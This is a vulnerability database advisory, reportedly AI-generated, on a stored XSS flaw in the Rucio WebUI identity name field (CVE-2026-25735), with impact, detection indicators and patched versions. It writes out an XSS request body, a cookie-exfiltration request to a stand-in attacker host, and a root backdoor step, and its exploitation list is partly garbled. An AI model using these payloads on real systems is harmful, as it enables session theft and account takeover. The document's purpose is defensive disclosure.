
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-25735 is a Stored Cross-Site Scripting (XSS) vulnerability in the Identity Name field of the Rucio WebUI, a scientific data management platform developed by CERN. Attacker-controlled input submitted as an account identity name is persisted by the backend and later rendered in the WebUI without proper output encoding, enabling arbitrary JavaScript execution in the WebUI origin for any authenticated user who views the affected page. Affected versions include rucio-webui before 35.8.3, versions 36.0.0rc1 through 38.5.3, and versions 39.0.0rc1 through 39.3.0. The vulnerability was published on February 25, 2026, with patches released the same day. It carries a CVSS v3.1 base score of 6.1 (Medium) per the GitHub Advisory, with high confidentiality and integrity impact (GitHub Advisory, Rucio Advisory).
The root cause is improper neutralization of user-controlled input during web page generation (CWE-79), compounded by the absence of the HttpOnly flag on session cookies (CWE-1004). An authenticated attacker with sufficient privileges to add an account identity (via Admin > Account Management > Add Account Identity) can submit a JavaScript payload as the identity name via a POST request to /proxy/accounts/{account}/identities. The backend stores this payload without sanitization, and when any user navigates to the account management page (e.g., /ui/account?account={account}), the stored payload is rendered using unsafe DOM methods such as .html() without HTML escaping, triggering execution. The attack requires high privileges to inject the payload but only requires another user to view the affected page to trigger it (GitHub Advisory, Rucio Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the Rucio WebUI origin for any user who views the affected account management page. The impact is amplified by two compounding weaknesses: session cookies lack the HttpOnly flag (making them accessible to JavaScript), and API tokens are exposed to the WebUI via JavaScript variables (e.g., var token = "root-root-webui-..."). Concrete attacker actions include exfiltrating session tokens or API credentials to an external server, creating backdoor UserPass identities with attacker-known passwords, creating or deleting Resource Storage Elements (RSEs), and performing other privileged actions as the victim user — including potentially creating a root-level account (Rucio Advisory).
A proof-of-concept exploit is publicly documented in the GitHub security advisory, including a specific XSS payload capable of creating a root UserPass identity. There is no evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.092% (26th percentile), indicating a low near-term exploitation probability (GitHub Advisory, Rucio Advisory).
/proxy/accounts/{account}/identities with a malicious JavaScript payload as the identity field value. Example request body: {"identity":"<img src=x onerror=alert(document.cookie)>","authtype":"SSH","email":"test@example.org"}. The server responds with HTTP 201 CREATED, confirming the payload is stored./ui/account?account={account}. The stored payload renders without HTML escaping, executing the JavaScript in the victim's browser.GET https://attacker.example.com/rucio/{BASE64_COOKIE}.PUT /identities/root/userpass request, establishing persistent backdoor access (Rucio Advisory).GET https://attacker.example.com/rucio/<BASE64_STRING>); unusual PUT requests to /identities/root/userpass from WebUI sessions./proxy/accounts/{account}/identities with HTML/JavaScript content in the request body (e.g., <img, <script, onerror=); unexpected HTTP 201 responses for identity creation with suspicious identity names.root account or other privileged accounts not created by known administrators; unexpected new account identities with non-standard naming patterns.Upgrade rucio-webui to one of the patched versions: 35.8.3 (for the 35.x LTS branch), 38.5.4 (for the 36.x–38.x branch), or 39.3.1 (for the 39.x branch), all released on February 25, 2026. As defense-in-depth measures, enforce the HttpOnly flag on all session cookies, implement a strict Content Security Policy (CSP), avoid exposing API tokens in JavaScript-accessible variables, and replace unsafe DOM methods like .html() with .text() or sanitized templating. Administrators should also audit existing account identities for any entries containing HTML or JavaScript syntax (Rucio Advisory, Release 35.8.3, Release 38.5.4, Release 39.3.1).
The vulnerability was reported by security researcher d-woosley and published by Rucio maintainer bziemons on February 25, 2026. Red Hat acknowledged the CVE in their security tracking system. No significant broader media coverage or notable community commentary beyond the GitHub advisory has been identified (Rucio Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."